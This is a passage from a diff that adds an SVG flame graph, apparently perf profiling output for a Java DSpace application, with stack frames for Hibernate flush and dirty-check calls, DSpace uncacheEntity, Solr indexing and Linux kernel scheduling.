+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (8 samples, 1.18%)</title><rect x="530.2" y="517" width="13.9" height="15.0" fill="rgb(75,223,75)" rx="2" ry="2" />
+<text  x="533.18" y="527.5" ></text>
+</g>
+<g >
+<title>__audit_syscall_entry (1 samples, 0.15%)</title><rect x="327.7" y="757" width="1.7" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="330.69" y="767.5" ></text>
+</g>
+<g >
+<title>ext4_mark_inode_dirty (1 samples, 0.15%)</title><rect x="945.6" y="69" width="1.8" height="15.0" fill="rgb(252,125,125)" rx="2" ry="2" />
+<text  x="948.62" y="79.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (13 samples, 1.92%)</title><rect x="329.4" y="869" width="22.7" height="15.0" fill="rgb(213,68,68)" rx="2" ry="2" />
+<text  x="332.44" y="879.5" >d..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="1010.2" y="437" width="1.8" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="1013.21" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="236.9" y="581" width="5.3" height="15.0" fill="rgb(219,77,77)" rx="2" ry="2" />
+<text  x="239.92" y="591.5" ></text>
+</g>
+<g >
+<title>__intel_pmu_enable_all.constprop.0 (12 samples, 1.78%)</title><rect x="474.3" y="693" width="21.0" height="15.0" fill="rgb(207,61,61)" rx="2" ry="2" />
+<text  x="477.32" y="703.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (7 samples, 1.04%)</title><rect x="530.2" y="469" width="12.2" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="533.18" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/CascadeStyle$11:::hasOrphanDelete (1 samples, 0.15%)</title><rect x="1041.6" y="437" width="1.8" height="15.0" fill="rgb(76,223,76)" rx="2" ry="2" />
+<text  x="1044.63" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="1151.6" y="453" width="3.5" height="15.0" fill="rgb(220,79,79)" rx="2" ry="2" />
+<text  x="1154.60" y="463.5" ></text>
+</g>
+<g >
+<title>[libjava.so] (1 samples, 0.15%)</title><rect x="917.7" y="405" width="1.7" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="920.69" y="415.5" ></text>
+</g>
+<g >
+<title>sun/reflect/GeneratedMethodAccessor23:::invoke (2 samples, 0.30%)</title><rect x="933.4" y="501" width="3.5" height="15.0" fill="rgb(69,217,69)" rx="2" ry="2" />
+<text  x="936.40" y="511.5" ></text>
+</g>
+<g >
+<title>msort_with_tmp.part.0 (1 samples, 0.15%)</title><rect x="104.3" y="917" width="1.7" height="15.0" fill="rgb(208,63,63)" rx="2" ry="2" />
+<text  x="107.26" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionOutputBuffer:::write (1 samples, 0.15%)</title><rect x="956.1" y="341" width="1.7" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="959.09" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (6 samples, 0.89%)</title><rect x="573.8" y="437" width="10.5" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="576.82" y="447.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="551.1" y="421" width="1.8" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="554.12" y="431.5" ></text>
+</g>
+<g >
+<title>hid_input_report (1 samples, 0.15%)</title><rect x="1113.2" y="309" width="1.7" height="15.0" fill="rgb(238,106,106)" rx="2" ry="2" />
+<text  x="1116.20" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::encode (1 samples, 0.15%)</title><rect x="954.3" y="341" width="1.8" height="15.0" fill="rgb(56,206,56)" rx="2" ry="2" />
+<text  x="957.35" y="351.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (2 samples, 0.30%)</title><rect x="593.0" y="469" width="3.5" height="15.0" fill="rgb(93,239,93)" rx="2" ry="2" />
+<text  x="596.02" y="479.5" ></text>
+</g>
+<g >
+<title>java/io/PrintWriter:::write (1 samples, 0.15%)</title><rect x="950.9" y="261" width="1.7" height="15.0" fill="rgb(57,206,57)" rx="2" ry="2" />
+<text  x="953.86" y="271.5" ></text>
+</g>
+<g >
+<title>tick_sched_timer (1 samples, 0.15%)</title><rect x="514.5" y="373" width="1.7" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="517.47" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (4 samples, 0.59%)</title><rect x="886.3" y="485" width="7.0" height="15.0" fill="rgb(92,238,92)" rx="2" ry="2" />
+<text  x="889.27" y="495.5" ></text>
+</g>
+<g >
+<title>__libc_recv (17 samples, 2.51%)</title><rect x="470.8" y="917" width="29.7" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="473.83" y="927.5" >__..</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="929.9" y="421" width="1.8" height="15.0" fill="rgb(202,54,54)" rx="2" ry="2" />
+<text  x="932.91" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (372 samples, 55.03%)</title><rect x="528.4" y="677" width="649.4" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="531.43" y="687.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (19 samples, 2.81%)</title><rect x="291.0" y="901" width="33.2" height="15.0" fill="rgb(251,125,125)" rx="2" ry="2" />
+<text  x="294.04" y="911.5" >pt..</text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (13 samples, 1.92%)</title><rect x="1055.6" y="485" width="22.7" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="1058.59" y="495.5" >o..</text>
+</g>
+<g >
+<title>java/lang/Throwable:::printEnclosedStackTrace (1 samples, 0.15%)</title><rect x="950.9" y="293" width="1.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="953.86" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/HttpStrictMultipart:::formatMultipartHeader (1 samples, 0.15%)</title><rect x="954.3" y="357" width="1.8" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="957.35" y="367.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (18 samples, 2.66%)</title><rect x="292.8" y="853" width="31.4" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="295.78" y="863.5" >__..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultEvictEventListener:::onEvict (1 samples, 0.15%)</title><rect x="528.4" y="485" width="1.8" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="531.43" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (3 samples, 0.44%)</title><rect x="907.2" y="469" width="5.3" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="910.22" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (74 samples, 10.95%)</title><rect x="573.8" y="549" width="129.2" height="15.0" fill="rgb(90,236,90)" rx="2" ry="2" />
+<text  x="576.82" y="559.5" >org/dspace/core/..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (2 samples, 0.30%)</title><rect x="568.6" y="421" width="3.5" height="15.0" fill="rgb(52,201,52)" rx="2" ry="2" />
+<text  x="571.58" y="431.5" ></text>
+</g>
+<g >
+<title>ip_output (1 samples, 0.15%)</title><rect x="472.6" y="773" width="1.7" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="475.57" y="783.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="293" width="1.8" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="1170.31" y="303.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (1 samples, 0.15%)</title><rect x="1146.4" y="421" width="1.7" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="1149.36" y="431.5" ></text>
+</g>
+<g >
+<title>ktime_get_update_offsets_now (1 samples, 0.15%)</title><rect x="102.5" y="693" width="1.8" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="105.51" y="703.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (33 samples, 4.88%)</title><rect x="1078.3" y="485" width="57.6" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="1081.28" y="495.5" >org/hi..</text>
+</g>
+<g >
+<title>java/lang/Throwable:::fillInStackTrace (1 samples, 0.15%)</title><rect x="1167.3" y="213" width="1.8" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="1170.31" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::containsKey (4 samples, 0.59%)</title><rect x="1151.6" y="549" width="7.0" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="1154.60" y="559.5" ></text>
+</g>
+<g >
+<title>[unknown] (19 samples, 2.81%)</title><rect x="291.0" y="917" width="33.2" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="294.04" y="927.5" >[u..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (4 samples, 0.59%)</title><rect x="886.3" y="501" width="7.0" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="889.27" y="511.5" ></text>
+</g>
+<g >
+<title>call_stub (372 samples, 55.03%)</title><rect x="528.4" y="661" width="649.4" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="531.43" y="671.5" >call_stub</text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="270.1" y="725" width="1.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="273.09" y="735.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::getOrphans (3 samples, 0.44%)</title><rect x="1128.9" y="437" width="5.2" height="15.0" fill="rgb(65,214,65)" rx="2" ry="2" />
+<text  x="1131.91" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.15%)</title><rect x="980.5" y="405" width="1.8" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="983.53" y="415.5" ></text>
+</g>
+<g >
+<title>[unknown] (9 samples, 1.33%)</title><rect x="271.8" y="917" width="15.7" height="15.0" fill="rgb(230,95,95)" rx="2" ry="2" />
+<text  x="274.83" y="927.5" ></text>
+</g>
+<g >
+<title>native_write_msr (32 samples, 4.73%)</title><rect x="46.7" y="725" width="55.8" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="49.66" y="735.5" >nativ..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="746.6" y="437" width="1.8" height="15.0" fill="rgb(231,96,96)" rx="2" ry="2" />
+<text  x="749.63" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="869" width="5.2" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="269.60" y="879.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/criteria/CriteriaJoinWalker:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="1053.8" y="501" width="1.8" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="1056.85" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (1 samples, 0.15%)</title><rect x="900.2" y="453" width="1.8" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="903.24" y="463.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::error (3 samples, 0.44%)</title><rect x="945.6" y="437" width="5.3" height="15.0" fill="rgb(109,254,109)" rx="2" ry="2" />
+<text  x="948.62" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 1.04%)</title><rect x="1177.8" y="869" width="12.2" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="1180.78" y="879.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/AbstractEntityJoinWalker:::initStatementString (1 samples, 0.15%)</title><rect x="1053.8" y="469" width="1.8" height="15.0" fill="rgb(101,246,101)" rx="2" ry="2" />
+<text  x="1056.85" y="479.5" ></text>
+</g>
+<g >
+<title>perf_swevent_add (1 samples, 0.15%)</title><rect x="322.5" y="693" width="1.7" height="15.0" fill="rgb(226,88,88)" rx="2" ry="2" />
+<text  x="325.46" y="703.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.15%)</title><rect x="242.2" y="661" width="1.7" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="245.16" y="671.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (3 samples, 0.44%)</title><rect x="952.6" y="533" width="5.2" height="15.0" fill="rgb(107,252,107)" rx="2" ry="2" />
+<text  x="955.60" y="543.5" ></text>
+</g>
+<g >
+<title>ip_protocol_deliver_rcu (2 samples, 0.30%)</title><rect x="512.7" y="549" width="3.5" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="515.72" y="559.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/protocol/RequestAddCookies:::process (1 samples, 0.15%)</title><rect x="1160.3" y="453" width="1.8" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="1163.33" y="463.5" ></text>
+</g>
+<g >
+<title>[unknown] (34 samples, 5.03%)</title><rect x="44.9" y="917" width="59.4" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="47.91" y="927.5" >[unkno..</text>
+</g>
+<g >
+<title>java/lang/reflect/Method:::invoke (372 samples, 55.03%)</title><rect x="528.4" y="789" width="649.4" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="531.43" y="799.5" >java/lang/reflect/Method:::invoke</text>
+</g>
+<g >
+<title>org/hibernate/engine/spi/TypedValue:::hashCode (1 samples, 0.15%)</title><rect x="673.3" y="421" width="1.8" height="15.0" fill="rgb(88,234,88)" rx="2" ry="2" />
+<text  x="676.31" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::list (1 samples, 0.15%)</title><rect x="1050.4" y="517" width="1.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="1053.36" y="527.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="1184.8" y="821" width="3.5" height="15.0" fill="rgb(225,86,86)" rx="2" ry="2" />
+<text  x="1187.76" y="831.5" ></text>
+</g>
+<g >
+<title>group_sched_in (1 samples, 0.15%)</title><rect x="322.5" y="725" width="1.7" height="15.0" fill="rgb(209,63,63)" rx="2" ry="2" />
+<text  x="325.46" y="735.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/EntityEntryContext:::reentrantSafeEntityEntries (1 samples, 0.15%)</title><rect x="680.3" y="453" width="1.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="683.30" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (11 samples, 1.63%)</title><rect x="661.1" y="453" width="19.2" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="664.09" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (20 samples, 2.96%)</title><rect x="1080.0" y="469" width="34.9" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="1083.03" y="479.5" >or..</text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="896.7" y="453" width="1.8" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="899.75" y="463.5" ></text>
+</g>
+<g >
+<title>schedule (4 samples, 0.59%)</title><rect x="352.1" y="805" width="7.0" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="355.13" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="901" width="5.2" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="269.60" y="911.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="517" width="3.5" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="241.67" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/http/util/EntityUtils:::getContentCharSet (1 samples, 0.15%)</title><rect x="957.8" y="517" width="1.8" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="960.84" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/cookie/BestMatchSpecFactory:::newInstance (1 samples, 0.15%)</title><rect x="1160.3" y="405" width="1.8" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="1163.33" y="415.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="357" width="1.8" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1170.31" y="367.5" ></text>
+</g>
+<g >
+<title>java/io/FileOutputStream:::write (1 samples, 0.15%)</title><rect x="917.7" y="453" width="1.7" height="15.0" fill="rgb(105,251,105)" rx="2" ry="2" />
+<text  x="920.69" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="469" width="3.5" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="241.67" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceResourceRestrictionPlugin:::additionalIndex (92 samples, 13.61%)</title><rect x="987.5" y="565" width="160.6" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="990.51" y="575.5" >org/dspace/discovery..</text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 1.04%)</title><rect x="1177.8" y="901" width="12.2" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="1180.78" y="911.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (68 samples, 10.06%)</title><rect x="704.7" y="501" width="118.7" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="707.73" y="511.5" >org/hibernate/..</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::doGetBean (2 samples, 0.30%)</title><rect x="1148.1" y="517" width="3.5" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="1151.11" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isDirty (1 samples, 0.15%)</title><rect x="872.3" y="453" width="1.8" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="875.31" y="463.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (34 samples, 5.03%)</title><rect x="44.9" y="821" width="59.4" height="15.0" fill="rgb(253,127,127)" rx="2" ry="2" />
+<text  x="47.91" y="831.5" >futex_..</text>
+</g>
+<g >
+<title>syscall_slow_exit_work (1 samples, 0.15%)</title><rect x="469.1" y="853" width="1.7" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="472.08" y="863.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/AbstractEntityJoinWalker:::initAll (1 samples, 0.15%)</title><rect x="1053.8" y="485" width="1.8" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="1056.85" y="495.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/io/SocketInputBuffer:::isDataAvailable (2 samples, 0.30%)</title><rect x="966.6" y="437" width="3.5" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="969.57" y="447.5" ></text>
+</g>
+<g >
+<title>itable stub (2 samples, 0.30%)</title><rect x="867.1" y="469" width="3.5" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="870.07" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEverythingToExecutions (17 samples, 2.51%)</title><rect x="544.1" y="469" width="29.7" height="15.0" fill="rgb(50,200,50)" rx="2" ry="2" />
+<text  x="547.14" y="479.5" >or..</text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="485" width="3.5" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="241.67" y="495.5" ></text>
+</g>
+<g >
+<title>__ext4_get_inode_loc (1 samples, 0.15%)</title><rect x="945.6" y="37" width="1.8" height="15.0" fill="rgb(208,61,61)" rx="2" ry="2" />
+<text  x="948.62" y="47.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::nullSafeGet (1 samples, 0.15%)</title><rect x="936.9" y="421" width="1.7" height="15.0" fill="rgb(82,230,82)" rx="2" ry="2" />
+<text  x="939.89" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="1167.3" y="325" width="1.8" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="1170.31" y="335.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.15%)</title><rect x="102.5" y="741" width="1.8" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="105.51" y="751.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/JoinWalker:::selectString (1 samples, 0.15%)</title><rect x="1053.8" y="453" width="1.8" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="1056.85" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushCollections (2 samples, 0.30%)</title><rect x="851.4" y="501" width="3.5" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="854.36" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/RequestWrapper:::getRequestLine (1 samples, 0.15%)</title><rect x="1162.1" y="437" width="1.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="1165.07" y="447.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.15%)</title><rect x="980.5" y="373" width="1.8" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="983.53" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (1 samples, 0.15%)</title><rect x="933.4" y="341" width="1.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="936.40" y="351.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (4 samples, 0.59%)</title><rect x="352.1" y="773" width="7.0" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="355.13" y="783.5" ></text>
+</g>
+<g >
+<title>org/dspace/browse/BrowseIndex:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="980.5" y="549" width="1.8" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="983.53" y="559.5" ></text>
+</g>
+<g >
+<title>org/hibernate/context/internal/ThreadLocalSessionContext$TransactionProtectionWrapper:::invoke (83 samples, 12.28%)</title><rect x="704.7" y="549" width="144.9" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="707.73" y="559.5" >org/hibernate/cont..</text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObjectServiceImpl:::getMetadata (7 samples, 1.04%)</title><rect x="919.4" y="565" width="12.3" height="15.0" fill="rgb(52,202,52)" rx="2" ry="2" />
+<text  x="922.44" y="575.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/DSpaceServiceManager:::configureService (2 samples, 0.30%)</title><rect x="1148.1" y="437" width="3.5" height="15.0" fill="rgb(88,234,88)" rx="2" ry="2" />
+<text  x="1151.11" y="447.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::intern (1 samples, 0.15%)</title><rect x="1052.1" y="469" width="1.7" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="1055.10" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/Bundle:::getBitstreams (1 samples, 0.15%)</title><rect x="936.9" y="533" width="1.7" height="15.0" fill="rgb(53,203,53)" rx="2" ry="2" />
+<text  x="939.89" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/StatefulPersistenceContext:::reassociateIfUninitializedProxy (2 samples, 0.30%)</title><rect x="1060.8" y="405" width="3.5" height="15.0" fill="rgb(81,228,81)" rx="2" ry="2" />
+<text  x="1063.83" y="415.5" ></text>
+</g>
+<g >
+<title>__audit_syscall_entry (1 samples, 0.15%)</title><rect x="350.4" y="837" width="1.7" height="15.0" fill="rgb(201,52,52)" rx="2" ry="2" />
+<text  x="353.38" y="847.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::isDirty (64 samples, 9.47%)</title><rect x="591.3" y="501" width="111.7" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="594.27" y="511.5" >org/hibernate..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::flushEntities (6 samples, 0.89%)</title><rect x="1135.9" y="453" width="10.5" height="15.0" fill="rgb(95,241,95)" rx="2" ry="2" />
+<text  x="1138.89" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.15%)</title><rect x="748.4" y="437" width="1.7" height="15.0" fill="rgb(59,209,59)" rx="2" ry="2" />
+<text  x="751.37" y="447.5" ></text>
+</g>
+<g >
+<title>futex_wait_queue_me (8 samples, 1.18%)</title><rect x="271.8" y="821" width="14.0" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="274.83" y="831.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="359.1" y="837" width="5.2" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="362.11" y="847.5" ></text>
+</g>
+<g >
+<title>Interpreter (372 samples, 55.03%)</title><rect x="528.4" y="613" width="649.4" height="15.0" fill="rgb(210,64,64)" rx="2" ry="2" />
+<text  x="531.43" y="623.5" >Interpreter</text>
+</g>
+<g >
+<title>newidle_balance (1 samples, 0.15%)</title><rect x="462.1" y="757" width="1.7" height="15.0" fill="rgb(208,63,63)" rx="2" ry="2" />
+<text  x="465.10" y="767.5" ></text>
+</g>
+<g >
+<title>itable stub (5 samples, 0.74%)</title><rect x="992.8" y="453" width="8.7" height="15.0" fill="rgb(219,78,78)" rx="2" ry="2" />
+<text  x="995.75" y="463.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (32 samples, 4.73%)</title><rect x="46.7" y="757" width="55.8" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="49.66" y="767.5" >__per..</text>
+</g>
+<g >
+<title>org/dspace/core/Context:::uncacheEntity (220 samples, 32.54%)</title><rect x="528.4" y="597" width="384.1" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="531.43" y="607.5" >org/dspace/core/Context:::uncacheEntity</text>
+</g>
+<g >
+<title>schedule (4 samples, 0.59%)</title><rect x="1169.1" y="261" width="6.9" height="15.0" fill="rgb(204,57,57)" rx="2" ry="2" />
+<text  x="1172.05" y="271.5" ></text>
+</g>
+<g >
+<title>org/dspace/core/HibernateDBConnection:::uncacheEntity (53 samples, 7.84%)</title><rect x="1055.6" y="549" width="92.5" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="1058.59" y="559.5" >org/dspace/..</text>
+</g>
+<g >
+<title>java/io/PrintWriter:::write (1 samples, 0.15%)</title><rect x="947.4" y="277" width="1.7" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="950.37" y="287.5" ></text>
+</g>
+<g >
+<title>hid_report_raw_event (1 samples, 0.15%)</title><rect x="1113.2" y="293" width="1.7" height="15.0" fill="rgb(213,70,70)" rx="2" ry="2" />
+<text  x="1116.20" y="303.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="236.9" y="597" width="5.3" height="15.0" fill="rgb(229,92,92)" rx="2" ry="2" />
+<text  x="239.92" y="607.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/config/DSpaceConfigurationService:::getPropertyKeys (2 samples, 0.30%)</title><rect x="1148.1" y="421" width="3.5" height="15.0" fill="rgb(90,237,90)" rx="2" ry="2" />
+<text  x="1151.11" y="431.5" ></text>
+</g>
+<g >
